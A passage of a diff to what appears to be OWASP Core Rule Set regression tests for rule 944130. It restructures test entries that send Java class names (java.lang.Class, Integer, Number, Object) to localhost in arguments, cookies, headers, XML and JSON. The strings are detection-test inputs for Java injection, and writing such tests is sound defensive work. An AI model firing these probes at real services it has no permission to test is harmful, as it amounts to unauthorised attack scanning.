application/json arg value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Class\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log_contains: "id \"944130\"" + - test_id: 275 desc: "Content-Type application/json arg name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Class\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 276 desc: "Argument test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_id: 277 desc: "Argument name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log_contains: "id \"944130\"" + - test_id: 278 desc: "Cookie test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Integer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Integer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 279 desc: "Cookie name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Integer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 280 desc: "Request header test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Integer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 281 desc: "XML attribute value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 282 desc: "XML element value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-283 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_id: 283 desc: "Nested XML element value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_id: 284 desc: "Content-Type text/plain includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_id: 285 desc: "Content-Type application/json arg value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Integer\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log_contains: "id \"944130\"" + - test_id: 286 desc: "Content-Type application/json arg name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Integer\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 287 desc: "Argument test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_id: 288 desc: "Argument name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log_contains: "id \"944130\"" + - test_id: 289 desc: "Cookie test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Number - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 290 desc: "Cookie name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Number=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 291 desc: "Request header test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Number - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 292 desc: "XML attribute value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-293 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 293 desc: "XML element value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_id: 294 desc: "Nested XML element value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_id: 295 desc: "Content-Type text/plain includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_id: 296 desc: "Content-Type application/json arg value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Number\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log_contains: "id \"944130\"" + - test_id: 297 desc: "Content-Type application/json arg name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Number\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 298 desc: "Argument test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_id: 299 desc: "Argument name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object=test" + output: + log_contains: "id \"944130\"" + - test_id: 300 desc: "Cookie test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Object - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 301 desc: "Cookie name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Object=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 302 desc: "Request header test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 